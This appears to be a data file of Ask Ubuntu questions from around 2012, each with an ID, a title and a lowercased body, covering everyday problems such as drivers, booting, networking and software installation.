level ) 777 bdevicesubclass 0 778 bdeviceprotocol 0 779 bmaxpacketsize0 64 780 bnumconfigurations 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
211858	gnome classic + unity dash	i like gnome classic more then gnome shell or unity because it has a taskbar and applications and places menus on top . but the one thing i am really really missing is the dash from gnome 3 and unity , that comes up when i press the `` super '' key . how can i use gnome shell with the task bar and the applications and places on top , or use gnome classic with the unity dash , or use gnome classic with an alternative launcher ?
211861	transmission core dump very often on ubuntu 12.04	i just ran transmission for the first time on 12.04 . it is core dumping about every 10 minutes with a segmentation fault . the only message i am getting is : segmentation fault ( core dumped ) exit code is 139 core dump available at https : //dl.dropbox.com/u/14533621/core.transmission
211862	cairo dock does n't switch between windows by [ alt ] + [ tab ]	i 'm using cairo dock ( in ubuntu 12.10 ) and there is one issue : it does n't switch between opened windows by [ alt ] + [ tab ] . i 'm sure , it 's not the compiz problem , cause [ alt ] + [ tab ] shortcut works well in unity , gnome 2 and gnome 3 , but it does n't in cairo dock . what can i do to resolve that issue ?
211863	permission denied error when trying to reload ~/.bash_profile	hello people i am trying to reload the `` ~/.bash_profile '' but i get the `` permission denied error '' and `` sudo '' does not work is there a way i can reload the `` ~/.bash_profile '' because it 's an integral step in the installation of rvm . please help any assistance is appreciated . mojo706
211868	why wo n't skype install ?	i have 64-bit 12.10 ubuntu . i ca n't get skype to install from the software center because it ca n't find the repositories . i ca n't install it from the website either . i tried checking the 64-bit debian package in case it would work and it installed but it wo n't open . what should i do ?
211870	how to convert all pdf files to text ( within a folder ) with one command ?	i know that i can convert pdf files to text files one by one like this : $ pdftotext filename.pdf but is there a single command that would make that conversion without specifying separate file names so as to convert them all ? i see here , on wikipedia , that `` wildcards ( * ) , for example $ pdftotext *pdf , for converting multiple files , can not be used because pdftotext expects only one file name . ''
211871	'ls ' and file managers hang on home directory after installing kde	today i installed kde on my ubuntu 12.04 using : apt-get install kubuntu-desktop everything is running fine , apart from one very strange issue : it seems impossible to list the files in my home directory , in any file manager or by using the 'ls ' command . for example : ls ~/ just hangs , whereas ls ~/dropbox works fine . any help will be appreciated ? edit : `` sudo ls '' works as expected .
211872	skype 'installing purchase '	i 'm trying to install skype on my 64bit ubuntu 12.10 machine through the software center , but after clicking install it just keeps on saying `` installing purchase '' instead of actually downloading skype . after a few minutes it just stops as it times out or whatever . anybody know what this would happen ? thanks in advance !
211881	ca n't acces files on precise	i have 12.04 installed on my laptop . i am the admin of the computer , but every time i try to change file permissions to access files or tick execute file as program then it just changes back quickly or unticks the box quickly . i am really desperate ! please help .
211883	icons have disappeared from desktop , and right-click fails	i ca n't right click anything and there are n't the usual icons on my desktop . i 'm using gnome classic . i think there was a gnome setting that turns off or back on . how can i fix this ?
211886	ubuntu not recognizing iphone	i know there are alot of these questions that have been asked , and solved . but i followed those i found , and for me , neither of them worked for me ! ifuse wo n't detect my iphone ! a few days ago i could access my iphone just normally , but now , it does n't work ! : ( here are some specs : iphone ( before ) : model : iphone 4 ios version : ios 6.0 jailbroken ? : yes using stand/dock ? : no iphone ( after ) : model : iphone 4 ios version : ios 6.0.1 jailbroken ? : no using stand/dock ? : yes computer : model : mac mini ( mid-2009 ) ubuntu version : 10.04 lucid usb-ports : 5 and yes , i have tested to empty all used usb 's expect for the iphone 's charging cable and i have tested with the original apple usb cable oh , and by the way , i tried with my sisters iphone 3g and it worked just fine ! and still no difference !
211887	resizing in virtual machine	i 'm running ubuntu 12.04 on a mac using virtual box . i tweaked /etc/default/grub to boot the machine into terminal mode only . i restarted , and everything was working fine . however , the terminal screen seemed very small so i went back and tweaked the grub_gfxmode= part to 1500x800 . i did sudo update-grub again , and then restarted . however , after restarting the machine gets stuck with this screen . anybody have any ideas on what to do ? ubuntu version is 12.04 , running on mac os x 10.8 .
211888	ca n't access to `` online accounts '' with system settings	i tried to access online accounts with the system settings but it 's just not there ... i succeed to open it via terminal , but how can it be back with all the other system settings icon ?
211890	impress missing pictures	in impress 3.5.4.2 pictures are missing when reopening an odp presentation ! they were n't linked but saved in the odp-file ! is this a known issue ?
211891	what is the difference between upgrading and renewing ?	in this page : http : //help.ubuntu.com/community/upgradenotes they suddenly start talking about `` renewing '' an ubuntu installation , but without a single explanation as to what they mean nor how to do it . could someone please explain that concept ?
211892	application as desktop background in ubuntu	i was thinking , if there is any way to set , for example , a java application as my desktop background ? i 'd love to see lotka-volterra predator-prey model visualization on my desktop . an example of this program : http : //en.alife.pl/predators-and-prey-the-lotka-volterra-model
211895	cant access file properties !	i have ubuntu 12.04 precise pangolin installed on my laptop . i am the admin of the computer , but anytime i try to change file permissions to acces files or tick exectute file as program then he just changes back quickly or unticks the box quickly . please help ! ! !
211910	ubuntu 12.04 and realtek wireless card incompatible	quick background : i installed linux ubuntu 12.04 on a dell inspiron 3520 after uninstalling windows 8 . a friend suggested to do this as opposed to buying a laptop with linux pre-installed . everything except the wireless card works . when i load up the laptop , i see a wireless animation as if it 's trying to locate the wireless connection ( for a while , then it goes blank ) , but no connections appear under the wireless option ( under `` edit connections '' then `` wireless '' ) . what i 've tried : - doing ndiswrapper . failed . - installing a few kernels for realtek . failed .
211912	what 's the caret ( ^ ) mean in apt-get ?	i 'm seeing various instructions that request that you install something like : apt-get install lamp-server^ with the oddball caret in the command . it does n't seem to be mentioned in apt-get manual . what 's the deal ?
211914	ethernet not working on new lubuntu 12.10 installation	the title says it all , i freshly installed lubuntu 12.10 and it is n't able to connect to the intranet and/or internet . actually , it is working randomly , if i restart the computer 2-3 times , it might work 1 time . but it 's now booted up and not working . here 's what i got from lspci , lsmod and ifconfig : daniel @ server : ~ $ lspci 00:00.0 host bridge : intel corporation 82q963/q965 memory controller hub ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82q963/q965 integrated graphics controller ( rev 02 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hb/hr ( ich8/r ) lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801h ( ich8 family ) 4 port sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801hr/ho/hh ( ich8r/do/dh ) 2 port sata controller [ ide mode ] ( rev 02 ) 03:00.0 ethernet controller : broadcom corporation netxtreme bcm5755 gigabit ethernet pci express ( rev 02 ) 0a:0c.0 multimedia controller : philips semiconductors saa7131/saa7133/saa7135 video broadcast decoder ( rev d1 ) daniel @ server : ~ $ lsmod module size used by saa7134_alsa 18052 0 rc_msi_tvanywhere_plus 12490 0 ir_kbd_i2c 12983 0 rfcomm 37276 0 bnep 17707 2 parport_pc 31968 0 bluetooth 183228 10 rfcomm , bnep ppdev 12817 0 tda827x 17778 1 coretemp 13168 0 kvm_intel 126745 0 kvm 357806 1 kvm_intel snd_hda_codec_analog 75059 1 tda8290 22061 1 tuner 26797 1 snd_hda_intel 32515 1 snd_hda_codec 111547 2 snd_hda_codec_analog , snd_hda_intel microcode 18209 0 snd_hwdep 13272 1 snd_hda_codec snd_pcm 80163 3 saa7134_alsa , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25382 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51255 2 snd_seq_midi , snd_seq_midi_event psmouse 84843 0 saa7134 157506 1 saa7134_alsa tpm_tis 18208 0 rc_core 21266 4 rc_msi_tvanywhere_plus , ir_kbd_i2c , saa7134 videobuf_dma_sg 18714 2 saa7134_alsa , saa7134 videobuf_core 25097 2 saa7134 , videobuf_dma_sg v4l2_common 15767 2 tuner , saa7134 videodev 95841 3 tuner , saa7134 , v4l2_common serio_raw 13031 0 tveeprom 17009 1 saa7134 snd_timer 24411 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq lpc_ich 16925 0 snd 61991 12 saa7134_alsa , snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device i915 457161 2 mac_hid 13037 0 drm_kms_helper 45271 1 i915 drm 230463 3 i915 , drm_kms_helper i2c_algo_bit 13197 1 i915 video 18847 1 i915 soundcore 14599 1 snd snd_page_alloc 14036 2 snd_hda_intel , snd_pcm lp 13299 0 parport 40753 3 parport_pc , ppdev , lp hid_generic 12445 0 usbhid 41702 0 hid 82142 2 hid_generic , usbhid floppy 55444 0 tg3 130448 0 daniel @ server : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1a:6b:51:4a : b7 adr inet6 : fe80 : :21a:6bff : fe51:4ab7/64 scope : lien up broadcast running multicast mtu:1500 metric:1 packets reçus:4 erreurs:0 :0 overruns:0 frame:0 tx packets:50 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:439 ( 439.0 b ) octets transmis:9972 ( 9.9 kb ) interruption:16 lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:16436 metric:1 packets reçus:4952 erreurs:0 :0 overruns:0 frame:0 tx packets:4952 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:377832 ( 377.8 kb ) octets transmis:377832 ( 377.8 kb ) the computer is a old lenovo/ibm m52 thinkcentre with an intel e6400 dual core , 2gb of ram and a gma950 igp chip . what 's wrong with the ethernet ? please note that windows 7 and windows xp are also installed on the same 40gb ssd and booting correctly from grub , both work correctly with my ethernet card . on my switch , i can see the light is green on this ibm computer 's port whether i 'm in xp , 7 or lubuntu os . please note that i 'm not a linux guru or whatsoever , i consider myself a noob and i 'm trying to do my best to learn .
211917	juju agent installation only through destroy and bootstrap	i have a working two node juju enabled maas that has the beginnings of hadoop installed . i got this working using the following steps : bootstrapping the environment adding a hadoop charm once i did added the charm , the second node appeared when i ran juju status . it was never able to install the agent , which always reported as not-started . to get the agent installed , i destroy-environment'ed my juju . then i did a bootstrap again . to my surprise all the nodes appeared in the list in maas as allocated to me , and then when i rebooted the second node , it all of a sudden wanted to install the image with the juju agent in it . so , i have two functioning nodes one is the juju environment node , the other is the hadoop master . what i am trying to do is bring a third node up so that i can have some slavecluster nodes . but i am now facing the same problem as with the second node : maas is not installing the juju-agent enabled image to the third node , so the agent status is always not-started . is this a juju problem , where juju must inform maas that it should install the correct image to the node ? or is this a maas problem where states are out of sync ? it really surprising that to get this to work , i have to destroy-environment , and then bootstrap again , and everything is ok . anyone have any ideas what i have done here ?
211918	problem installing ubuntu from usb	despuăšs de instalar ubuntu con el usb de arranque el programa te pide que reinicies el ordenador . pues bien , al reiniciarlo se queda en un bucle y vuelve a aparecer el menăş de instalar ubuntu o modo de prueba . si lo apago y vuelvo a encenderlo sin el usb , se queda colgado . he probado a volver a producir un usb de arranque desde ubuntu y sigue el mismo problema . gracias de antemano por la ayuda . saludos . google translate : after installing ubuntu with usb boot program prompts you to restart the computer . well , after a reboot stays in a loop and reappears ubuntu install menu or test mode . if i turn it off and back on again without the usb hangs . i tried to re-produce a bootable usb ubuntu and still the same problem . thanks in advance for the help . greetings .
211926	trouble hosting a minecraft server	i 've been trying to host a minecraft server for some time now . i 'm practically a complete beginner with linux thus far , so you may have to explain things to me a bit . i was able to host servers on windows in the past with relative ease . i 'm hosting the server locally through a wireless router . through google , i 've done things involving uninstalling openjdk and installing oracle 's java , doing something involving iptables , stopping the ufw service , updating lwjgl , and downloading firewall software . nothing has worked yet . i have 25565 forwarded . neither me nor a friend are able to join via external ip , though i can connect through localhost . it says i 'm connecting for some time , then gives me an error : minecraft version : 1.4.2 operating system : linux ( amd64 ) version 3.5.0-17-generic java version : 1.7.0_09 , oracle corporation java vm version : java hotspot ( tm ) 64-bit server vm ( mixed mode ) , oracle corporation memory : 396627816 bytes ( 378 mb ) / 514523136 bytes ( 490 mb ) up to 514523136 bytes ( 490 mb ) jvm flags : 2 total ; -xms512m -xmx512m aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used modloader : mods loaded : 3 modloader 1.4.2 mod_minelittlepony 1.4.2.3 inventory tweaks 1.44 ( 1.4.2 ) lwjgl : 2.8.4 opengl : geforce gtx 560 ti/pcie/sse2 gl version 4.2.0 nvidia 304.43 , nvidia corporation is modded : very likely type : client texture pack : default profiler position : n/a ( disabled ) vec3 pool size : ~error~ nullpointerexception : null java.lang.nullpointerexception at aww.a ( sourcefile:57 ) at ayt.b ( entityrenderer.java:1149 ) at entityrendererproxy.b ( entityrendererproxy.java:20 ) at net.minecraft.client.minecraft.j ( sourcefile:604 ) at net.minecraft.client.minecraft.run ( sourcefile:534 ) at java.lang.thread.run ( unknown source ) my friend does n't get this error however , and instead gets a timeout message , so that 's likely something on my end . if there 's any more information you need , i 'll gladly supply it if i can .
211928	i ca n't access ubuntu 12.10	i installed ubuntu 12.10 but i ca n't reach it . the boot page does n't appear and i ca n't choose which os i want to use . it goes directly to windows 8 .
211929	upgrade using terminal commands	i have heard many ways to upgrade to ubuntu 12.10 using terminal ( i am currently in 12.04 lts ) . what is the best way to upgrade through terminal ? thanks !
211931	how do i install amd mobility radeon 4250 drivers ?	i do n't know how to install them . i tried to install some drivers but when it rebooted i got a black screen . i had to boot into windows and wipe ubuntu/re-install all over again . can someone give me a link to drivers that work .
211933	install brother mfc295cn drivers to ubuntu	i 'm trying to get the drivers for my printer going , and not doing well . i tried the following : http : //ubuntuforums.org/showthread.php ? t=1377270 and the sudo dpkg -i package.deb format . it installs the printer , but then does n't see the printer via usb . ideas ?
211935	banshee sync playlsits lost order in device	i have a playlist manually ordered , also i synchronize it with my android , everything works fine , but when i reproduce the list from the android , the playlist is sorted alphabetically . also if i open it with a text editor i can confirm that the list is ordered this way . why is this happening ? is a bug or may be i have to configure something in banshee ? thank you .
211937	upgrades : should i stay on the ubuntu treadmill ?	ok , so i am a deadbeat . i just upgraded ubuntu 10.10 to 11.04 . ( i suspect now to have lts i can not have installed any packages from outside the core supported in lts ) . i did this only last week , the upgrade was done only after i used partition magic to rob space from an unused extended partition and i had to erase swap partitions to be able to resize the extended partition because it was busy , neither qparted or partition magic tell you that they found swap and are using it . they complain if you want to use that partition , and they should . the upgrade took a couple of hours and added more than a gig of usage on the root . so just today i get a notice from update manager that my install has fallen out of support . ok , i need to upgrade my install again this time to 12.04 and possibly on to 12.10 . so why am i doing this ? i thought that connonical was going to lessen this rat race , or is it a race condition ? i think that it is a bad idea to be on a bleeding edge anyway preferring to be down rev a couple . i vote for a longer support cycle and consider this cause to replace ubuntu with another linux .
211940	12.04 lts wo n't boot after modifying root directory permissions	i accidentally changed permissions to root directory on my system and now my system wo n't boot , i tried to fix packages from grub recovery and check file system but nothing . here 's the code i accidentally typed : sudo chown -hr jmayerz : jmayerz / after it executed , x11 shut down and system got stuck , so i rebooted and it wo n't boot again . i tried changing back permissions to system superuser from livecd but how can i change it to the user on the machine itself not the livecd ? like this : sudo mkdir /media/mount sudo mount /dev/sda1 /media/mount sudo chown -hr < user which originally owns root on the machine itself not livecd , i think root user > / how would that last line be executed ? ? which user is it ? ? and how is this executed from livcd ? when i try to use that method in recovery , it tells me that files are read-only , when i try to perform tasks that mount root in read-write it still does n't do it . mount -ro remount , rw says that /etc/fstab reports that directories are already mounted . chown -hr root / says that files are in read only mode , after mounting read-write through doing something like fixing packages , it does n't output anything . chmod -hr jmayerz : jmayerz /home/jmayerz/ same thing . and now the livecd wo n't boot , says general filesystem mount error .
211943	why could n't i mount windows 7 partition when it is hibernated ?	when i try to mount windows 7 partition when it is hibernated the system give me this message : so why this happen , and can i mount it read/write ?
211945	stop cpu from slowing down	when playing a 720p video file , i can hear the laptop cpu fan kick in which after a few minutes causes the video file to play back in a very choppy manner . is it possible to stop the cpu from slowing down like this ?
211955	ubuntu 12.10 64 bit not working	i have recently installed ubuntu 12.04 64 bit on my desktop that i use for testing hard/software . it was working fine . trying the 12.10 version gives me blank screen with only the mouse pointer moving . pc is the same in both cases and hd is wiped clean in both cases before installation . any thoughts why ?
211958	webcam not working on lenovo x230	i 've got ubuntu 12.04 running on my lenovo x230 . i ca n't get the integrated webcam working with google talk plugin or with cheese .
211971	v4l2-ctl exposure-auto setting fails	i am trying to tune a c920 webcam for picture quality using v4l2-ctl utility on ubuntu pc . i am unable to set exposure_auto to 'auto ' mode , but i am able to set it to 'manual mode ' or in 'aperture priority mode ' . any clues ? *lenovo @ ubuntu : ~ $ v4l2-ctl -d /dev/video1 -c exposure_auto=0 vidioc_s_ctrl : failed : input/output error exposure_auto : input/output error* following are the settings dump of c920 connected to my ubuntu : - brightness ( int ) : min=0 max=255 step=1 default=128 value=128 - contrast ( int ) : min=0 max=255 step=1 default=128 value=128 - saturation ( int ) : min=0 max=255 step=1 default=128 value=128 - white_balance_temperature_auto ( bool ) : default=1 value=1 - gain ( int ) : min=0 max=255 step=1 default=0 value=0 - power_line_frequency ( menu ) : min=0 max=2 default=2 value=2 - white_balance_temperature ( int ) : min=2000 max=6500 step=1 default=4000 value=4000 - sharpness ( int ) : min=0 max=255 step=1 default=128 value=128 - backlight_compensation ( int ) : min=0 max=1 step=1 default=0 value=0 - exposure_auto ( menu ) : min=0 max=3 default=3 value=3 ( 0 : auto mode 1 : manual mode 2 : shutter priority mode 3 : aperture priority mode ) - exposure_absolute ( int ) : min=3 max=2047 step=1 default=250 value=250 - exposure_auto_priority ( bool ) : default=0 value=1 - focus_absolute ( int ) : min=0 max=250 step=5 default=0 value=0 - focus_auto ( bool ) : default=1 value=1 - zoom_absolute ( int ) : min=100 max=500 step=1 default=100 value=100
211975	i removed nvidia driver and lshw -c video still shows nvidia	today i tried to activate the newer experimental drivers and both 304 and 310 failed to even install . so i tried the regular nvidia driver 295.40 for the 20th time today ( i had lag issues and was testing nouveau vs nvidia with dual monitor and unity2d-3d ) within my tty1 i tried to remove nvidia : sudo apt-get remove nvidia-settings nvidia-current and purge too reboot , nothing . so when lshw -c video displayed nvidia as my driver i tried sudo rm /etc/x11/xorg.conf since i read ubuntu would `` reset '' the gui conf but reboot , nothing . so next i tried sudo jockey-text -- disable=xorg : nvidia_current and nothing has worked ...
211987	how to return to stock android after installing ubuntu touch	whenever i try and uncompress the tar file , i get this : tar ( child ) : nakasi-jro03d-factory-e102ba72.tg : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now i 'm fairly new to ubuntu . so i 'm pretty sure that 's my fault . so i just compress it manually using the gui . but when i try to flash it , i get sudo : ./flash-all.sh : command not found
211989	boot without monitor	i 'm building a home media server for storing and streaming photos , video and music to other devices on my home network ( and maybe hosting a few personal websites ) . i 've bought the kit , assembled it , installed ubuntu 12.10 and successfully vnc 'd from my ubuntu 12.04 laptop to the server over my home network , when i 've got it hooked up to my hdmi tv . however , when it 's not hooked up to the tv , ( but then i plug in the hdmi cable ) it appears it boots into low graphics mode and wo n't auto login . i 've read various posts about resolving this issue , but i was n't sure whether they applied to my kit . i have no graphics card , but the cpu ( intel core i5 3570k ) has on board graphics ( i got this since the videos i 'll be streaming will need transcoding on the fly ) , so does that mean it 's not truly 'headless ' when i have no monitor attached ? the other thing i 'd like to do is vnc from other known devices , including windows 7 machine from work , so i 'd like to do this via keys rather than passwords , to make it secure , but also convenient . what i 'm not sure about is whether i need to create the /etc/x11/xorg.conf file as has been suggested in various places , or whether that 's just for truly headless systems without a gpu . if it is required , what settings should i use ? does it matter ? and also , if i use something like vnc4server , is the x11 hack above required at all ? i 'm guessing it is as it would n't boot would it ? or , if instead of 12.10 desktop , would the server edition , be a better option ? does the server edition not require a monitor to be attached , but can one be in case i need to ? can you still use vnc and see gnome etc on the server edition ? i 've limited experience with linux/ubuntu , so any assistance will be greatly appreciated .
211990	usb 3.0 drive not working in kubuntu 12.10	i have a laptop that has usb 3.0 ports only and my portable hd does n't work on it . i have a desktop that runs the same version of kubuntu and same kernel version but has usb 2.0 ports , the portable drive works fine there . portable drive : western digital my passport 1.0 tb kubuntu version : quantal 12.10 kernel version : 3.5.0-17-generic when i use lsusb right after connecting the portable drive , it is read . after 10 seconds it disappears . fdisk -l does n't see the drive at all . please note that i have installed ntfs-config and blacklisted uas . update : i plugged a usb 1.0 hub into the laptop and connected the portable hdd through it , it worked . but the portable hdd still does n't work when connected to the laptop usb 3.0 port directly .
211994	how to execute a bash command when you login	since my ubuntu system has some problem keeping of track of time , i want to add a bash script somewhere that has the ntpdate ntp.ubuntu.com command in it to reset the time to the correct time when i log in . where would i put this so the system does this when i login , not boot ? thanks .
211996	creating a new file with touch command actually creates eight unlisted files ?	have a look at this screenshot : pardon for my language used when i installed ubuntu . anyways , it is beyond my imagination how come creating an empty file actually creates eight files , alas , the extra seven wo n't be listed more than have their saying in the statistics . the total column clearly says eight . i 'm using ubuntu 12.10 x86 . also , in my nautilus file explorer , i have checked the option to view hidden and system files . maneuvering to the new somedir directory wo n't show more than just one file , the somefile file . so is the total count lying in my face or are there even more hidden files than the `` ordinary '' hidden files ? i 'm keen to know exactly what files gets created here , why so , and how come i ca n't list them . as a side note , adding the sudo prefix to the ls -l command wo n't make any difference for me . thank you so much in advance .
211998	how to fix `` the bumblebee daemon has not been started yet or the socket path was incorrect '' ?	i just bought a new dell xps 14 ultrabook which comes with a nvidia geforce gt 630m . so , following some indications that i found in the documentation available online i add the bumblebee ppa and installed bumblebee and nvidia-bumblebee . but when i tried to use the nvidia card to run something i got this error : optirun -vv firefox [ 476.380739 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 476.381430 ] [ info ] configured driver : nvidia [ 476.381498 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 476.381513 ] [ debug ] socket closed . [ 476.381534 ] [ error ] could not connect to bumblebee daemon - is it running ? here are some of the configuration files : /etc/bumblebee/bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # # client options . will take effect on the next optirun executed . [ optirun ] # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-current module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau /etc/bumblebee/xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` connectedmonitor '' `` dfp '' endsection and some additional information dpkg -l | grep nvidia ii bumblebee-nvidia 3.0.1-3~quantalppa1 amd64 nvidia optimus support using the proprietary nvidia driver ii nvidia-current 304.51.really.304.43-0ubuntu1 amd64 nvidia binary xorg driver , kernel module and vdpau library rc nvidia-current-updates 304.51-0ubuntu1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 304.51-0ubuntu2 amd64 tool for configuring the nvidia graphics driver i removed the nvidia-current-updates because unity was not able to start with it installed . by the way , i 'm using the latest version of 64 bit ubuntu ( 12.10 ) ; and i have tried reinstalling bumblebee like 3 times . can you help me fixing this error ? is there other information you might need in order to help me ? thanks in advance .
212005	can not use `` ./ '' to execute a shell script	maybe someone here would be able to help me out . have installed ubuntu 12.04 lts ( kubuntu ) on two machines . the .bashrc and .bash_profile files are identical as the file structures on each machine is the same . on machine 1 i run bash scripts within a terminal window with the simple : ./scriptname.sh on machine 2 , i can not do this and must use : sh scriptname.sh nor can i use ./ and tab-complete the script filename . all executable bits are set correctly , all files and folders have the correct permissions . in the header of the scripts the shebang is set correctly . any ideas why this would be occurring ? cheers
212007	why does ubuntu delay a lot on booting ?	i have a problem . my ubuntu delays a lot to boot , my computer is 4gb ram , core2duo 3.2ghz this is my bootchart : http : //img841.imageshack.us/img841/138/desktopmvx.png i ca n't understand what is the problem . thank you . original question in spanish : por que tarda tanto el arranque de ubuntu ? hola les comento que tengo un problema mi ubuntu tarda demasiado arrancando , mi computadora es 4gb ram , core2duo 3.2ghz este es mi bootchart http : //img841.imageshack.us/img841/138/desktopmvx.png no entiendo cual es el problema . gracias !
212008	maas ca n't deploy ubuntu server due to missing boot kernel	i can pxe boot ubuntu 12.04 lts with my new maas 12.10 server . if i change the default deployment distro to 12.10 i get a tftp boot error that is complaing that the boot kernel ca n't be found ? does the maas-import-pxe-files import all the required files for 12.10 server deployment or is there something extra that i need to do ?
212009	blinking cursor when booting into xen 4.1 with 3.2.0-32-generic kernel	i 've installed ubuntu 12.04 onto a machine with an amd athlon ii x4 620 cpu , gigabyte ga-ma785gmt-ud2h motherboard , and 16 gb of ram . 12.04 boots fine with the 3.2.0-29-generic and 3.2.0-32-generic kernel , but after xen 4.1 is installed and xen is booted from the grub bootloader , the echo options are printed to the console , but then a blank screen appears with a blinking cursor . nothing happens after this point . grub options ( x 's replace uuid ) : setparams 'xen 4.1-amd64' menuentry 'ubuntu gnu/linux , with xen 4.1-amd64 and linux 3.2.0-32-generic -- class ubuntu -- class gnu -- class os -- class xen { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx echo 'loading xen 4.1-amd64 ... ' multiboot /xen-4.1-amd64.gz placeholder echo `` loading linux 3.2.0-32-generic ... ' module /vmlinuz-3.2.0-32-generic placeholder root=/dev/mapper/ubuntuxen-root ro echo 'loading initial ramdisk ... ' module /initrd.img-3.2.0-320generic } this configuration is identical to a virtualbox vm and the vm boots into xen without issue . i 'm not ruling out hardware here , i am just unable to find resources to lead me to a specific cause . note : i setup xen using this ubuntu community resource : xen
212013	name resolver does n't work	oh , hello ! tried to fix name resolution on my ubuntu 12.04 lts box using answers read here ... no effect at all : tried to move /etc/resolv.conf link away tried to change hosts order in /etc/nsswitch.conf tried to reboot|remove|reconfigure my linksys , which is a dhcp server for my network no results . for now , i 'm using `` reload button '' method 'till desired site is open , though if i 've misspelled its fqdn . can anyone advise something else ?
212017	thunderbird gmail with priority inbox ?	is it possible to get thunderbird to show the [ gmail ] /important as the default inbox ? if so , how ?
212020	custom plymouth splashes ?	i am working on trying to make my own plymouth boot screen , but the internet does n't seem to have that many articles about it . i was hoping someone could give me a crash course on what to do to make one . what exactly is needed and has to be edited ? thanks : )
212024	where are the `` old '' restricted drivers for dvb-t cards ?	another issue with ubuntu 12.10 : i have an usb dvb avermedia card in 12.04 , and all previous versions i remember since 10.x worked with this hardware enabling its driver in `` restricted drivers '' . now i discovered that i can not even enable the card , any idea ? thanks
212026	ubuntu 12.04 not booting from usb	i recently made my usb bootable with universal usb installer and changed the boot priority settings in bios..but when i restarts my pc my old xp loads . what can i do to boot the usb stick ? my pc config : 1.25gb ram intel 845g motherboard p4 2.4ghz 500gb hdd
212027	getting build dependencies and source by default	is there an application by which the build dependency as well as the source code of the software gets downloaded automatically as soon as we install the software from a .deb package or the software center ?
